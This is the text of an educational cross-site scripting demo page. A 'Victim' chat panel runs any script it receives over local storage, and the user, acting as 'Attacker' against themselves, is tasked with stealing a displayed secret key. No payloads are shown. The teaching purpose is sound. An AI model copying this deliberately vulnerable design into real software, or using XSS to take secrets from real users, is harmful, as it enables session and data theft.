Cross-site scripting (XSS) Demo App

Having issues? Click here to reset the local storage and refresh the page.

This demo attempts to illustrate (with hands on) what XSS is and how it works. Since we don't want anything bad to happen, you are only able to attack yourself (messages are exchanged via local storage. So you will need to have two tabs open; one for the victim and one for the attacker.

The "Victim" does not require any input from you, it will accept messages (via local storage) from the attacker and execute any payloads in the messages. You just need to keep the page open so messages have somewhere to go.

The "Attacker" your mission is to obtain the secret key from the victim, using XSS.


XSS Chat (Victim)

Your secret is: {{secret}}.

You shouldn't have to touch anything on this page. You are welcome to look at the source to see how you can best attck this "victim". Other than that, all actions should be done from the attacker's side.

Message from attacker

Send Message

XSS Chat (Attacker)

Responses

Shows all messages sent from the victim.

Send Message


Last updated: 2020/13/01
License: Creative Commons Attribution 4.0 International License.